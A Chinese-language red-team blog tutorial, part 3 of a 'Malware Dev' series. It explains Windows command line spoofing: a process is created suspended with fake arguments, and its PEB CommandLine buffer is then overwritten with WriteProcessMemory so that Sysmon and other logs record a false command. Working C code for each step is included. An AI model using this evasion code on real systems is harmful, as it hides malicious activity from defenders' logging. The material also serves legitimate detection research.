Malware Dev 03

编程入门行业动态更新时间:2024-10-05 09:31:22

Malware Dev 03

写在最前

如果你是信息安全爱好者，如果你想考一些证书来提升自己的能力，那么欢迎大家来我的 Discord 频道 Northern Bay。邀请链接在这里：

我拥有 OSCP，OSEP，OSWE，OSED，OSCE3，CRTO，CRTP，CRTE，PNPT，eCPPTv2，eCPTXv2，KLCP，eJPT 证书。

所以，我会提供任一证书备考过程中尽可能多的帮助，并分享学习和实践过程中的资源和心得，大家一起进步，一起 NB~

背景

红队/渗透测试离不开命令行，在命令行执行命令的时候，执行的命令以及命令的参数，会被系统日志记录。那么我们的真实目的，就会被一览无余。

为了进一步隐藏我们的真实目的，混淆视听，我们可以使用 Command Line Spoofing 这个技巧，修改进程的 PEB，来达到隐藏真实命令的效果。

这篇文章，我们就来看一下 Command Line Spoofing 是如何实现的。

Command Line Spoofing

概述

Command Line Spoofing 是通过修改进程 PEB（Process Environment Block）中的 RTL_USER_PROCESS_PARAMETERS 结构来达成的。原理就是这样，我们实践一下，看一下具体如何实现。

RTL_USER_PROCESS_PARAMETERS 结构

在命令行用 notepad 随便打开一个文件。

WinDBG hook 进程。

查看一下 PEB。

dt !_PEB

在 offset 0x20 的地方可以看到 RTL_USER_PROCESS_PARAMETERS 结构。

看一下官方的结构原型。

typedef struct _RTL_USER_PROCESS_PARAMETERS {BYTE           Reserved1[16];PVOID          Reserved2[10];UNICODE_STRING ImagePathName;UNICODE_STRING CommandLine;			// 重点在这里
} RTL_USER_PROCESS_PARAMETERS, *PRTL_USER_PROCESS_PARAMETERS;

第四个参数，CommandLine 是我们关注的重点。

我们看一下当前 _RTL_USER_PROCESS_PARAMETERS 的数据。

dt _RTL_USER_PROCESS_PARAMETERS

CommandLine 参数在 0x70 的位置上。

查看一下 _RTL_USER_PROCESS_PARAMETERS 结构在内存中的地址。

dt _peb @$peb

查看一下内存中的内容。可以直接点击 ProcessParameters。

dx -r1 ((wintypes!_RTL_USER_PROCESS_PARAMETERS *)0x16c2c0f2b60)

查看 CommandLine 成员的内容。直接点击即可。

dx -r1 (*((wintypes!_UNICODE_STRING *)0x16c2c0f2bd0))

我们可以看到，整个命令被保存在 CommandLine 成员的 Buffer 属性中。

我们跟 Process Hacker 对比一下。一致。

看到了 _RTL_USER_PROCESS_PARAMETERS 结构的内部，下面我们就需要在运行时更改这个结构中 CommandLine 成员的值。

_RTL_USER_PROCESS_PARAMETERS Runtime Patch

整体步骤如下：

创建一个挂起（suspend）进程，使用假的命令及参数作为 CreateProcess 的 commandline 参数；
找到当前进程的 _RTL_USER_PROCESS_PARAMETERS 结构；
修改 _RTL_USER_PROCESS_PARAMETERS 结构的 CommandLine 成员为真实的命令及参数；
恢复（resume）进程运行，以修改之后的命令及参数执行；

一步一步实现。

创建一个挂起（suspend）进程，使用假的命令及参数作为 CreateProcess 的 commandline 参数；
```
STARTUPINFO si = { sizeof(si) };
PROCESS_INFORMATION pi;WCHAR goodArgs[] = L"notepad all-good.txt";if (CreateProcess(L"C:\\Windows\\System32\\notepad.exe",goodArgs,										// 使用假的参数创建这个进程NULL,NULL,FALSE,CREATE_SUSPENDED,								// 创建挂起状态的进程NULL,L"C:\\",&si,&pi))
{_tprintf(L"Process created: %d", pi.dwProcessId);
}
```
我们在 88 行打个断点，debug 一下。

WinDBG hook 重复以上步骤查看 _RTL_USER_PROCESS_PARAMETERS 中的 CommandLine 成员。

看到了当前的虚假参数。接下来我们要找到 _RTL_USER_PROCESS_PARAMETERS，以便修改 CommandLine 成员。
找到当前进程的 _RTL_USER_PROCESS_PARAMETERS 结构；

我们继续分解成几个小步骤来完成。
- 1）获取 NtQueryInformationProcess 函数在 ntdll 中的地址以调用；
- 2）使用 NtQueryInformationProcess 函数获取 PROCESS_BASIC_INFORMATION，PEB 的地址包含在这个结构中；
- 3）使用 ReadProcessMemory 函数，从 PROCESS_BASIC_INFORMATION 中获取 PebBaseAddress 地址；
- 4）使用 ReadProcessMemory 函数，从 PebBaseAddress 中获取 ProcessParameters 地址，读取 RTL_USER_PROCESS_PARAMETERS 结构；
  
  下面我们一步一步来实现。
  
  1）获取 NtQueryInformationProcess 函数在 ntdll 中的地址以调用；
  
  要查看进程的信息，会使用到 NtQueryInformationProcess。
  
  函数原型。
```
__kernel_entry NTSTATUS NtQueryInformationProcess([in]            HANDLE           ProcessHandle,[in]            PROCESSINFOCLASS ProcessInformationClass,[out]           PVOID            ProcessInformation,[in]            ULONG            ProcessInformationLength,[out, optional] PULONG           ReturnLength
);
```
  NtQueryInformationProcess 这个函数不能直接使用，必须在运行时通过 GetProcAddress 函数获取其在 ntdll 中的地址。
  
  因此我们先定义一个函数原型。然后在运行时解析他的地址。
```
typedef NTSTATUS(*QueryInformationProcess)(IN HANDLE, IN PROCESSINFOCLASS, OUT PVOID, IN ULONG, OUT PULONG);// 运行时解析地址
HMODULE ntdll = GetModuleHandle(L"ntdll.dll");
QueryInformationProcess NtQueryInformationProcess = (QueryInformationProcess)GetProcAddress(ntdll, "NtQueryInformationProcess");
```
  至此，我们就可以调用 NtQueryInformationProcess 函数来获取
  
  2）使用 NtQueryInformationProcess 函数获取 PROCESS_BASIC_INFORMATION，PEB 的地址包含在这个结构中；
```
PROCESS_BASIC_INFORMATION pbi;
DWORD length;NtQueryInformationProcess(pi.hProcess,ProcessBasicInformation,		// 从 ProcessBasicInformation 中读取 PROCESS_BASIC_INFORMATION&pbi,							// 读取结果存放在 pbi 变量中sizeof(pbi),&length);
```
  3）使用 ReadProcessMemory 函数，从 PROCESS_BASIC_INFORMATION 中获取 PebBaseAddress 地址；
```
PEB peb;
SIZE_T bytesRead;ReadProcessMemory(pi.hProcess,pbi.PebBaseAddress,				// 从 pbi 中获取 PEB 的基地址&peb,							// PEB 的基地址存放在 peb 变量中sizeof(PEB),&bytesRead);
```
  4）使用 ReadProcessMemory 函数，从 PebBaseAddress 中获取 ProcessParameters 地址，读取 RTL_USER_PROCESS_PARAMETERS 结构；
```
RTL_USER_PROCESS_PARAMETERS rtlParams;ReadProcessMemory(pi.hProcess,peb.ProcessParameters,					// 从 PEB 的 ProcessParameters 中读取 RTL_USER_PROCESS_PARAMETERS 结构&rtlParams,								// 读取结果存放在 rtlParams 变量中sizeof(RTL_USER_PROCESS_PARAMETERS),&bytesRead);
```
  至此，RTL_USER_PROCESS_PARAMETERS 结构我们已经找到。接下来就是用真实的命令及参数，覆盖掉原来的虚假参数。

修改 _RTL_USER_PROCESS_PARAMETERS 结构的 CommandLine 成员为真实的命令及参数；

使用 WriteProcessMemory 函数写入新的命令及参数到 RTL_USER_PROCESS_PARAMETERS 的 CommanLine 成员中。

WCHAR evilArgs[] = L"notepad C:\\Users\\opr\\Desktop\\target-file.txt";
SIZE_T bytesWritten;WriteProcessMemory(pi.hProcess,rtlParams.CommandLine.Buffer,		// 写入到 RTL_USER_PROCESS_PARAMETERS -> CommandLine -> Buffer 中，修改原有的值evilArgs,							// 使用 evilArgs 覆盖 goodArgssizeof(evilArgs),&bytesWritten);

恢复（resume）进程运行，以修改之后的命令及参数执行最终命令；
```
ResumeThread(pi.hThread);
```

我们运行起来看一看是否能打开用户桌面的指定文件，并且配置 Sysmon 来查看日志记录的命令行。Sysmon 在这里下载。

这里抓取 notepad 进程的最简单 Sysmon config.xml 配置文件如下，保存到任意位置即可（这里我保存在了 \Windows\config.xml）。

<Sysmon schemaversion="4.60"><EventFiltering><!-- Event ID 1 == Process Creation - Includes --><RuleGroup groupRelation="or"><ProcessCreate onmatch="include"><OriginalFileName condition="is">notepad.exe</OriginalFileName><CommandLine name="technique_id=T9999,technique_name=whatever" condition="contains all">notepad.exe</CommandLine></ProcessCreate></RuleGroup></EventFiltering>
</Sysmon>

启动 Sysmon。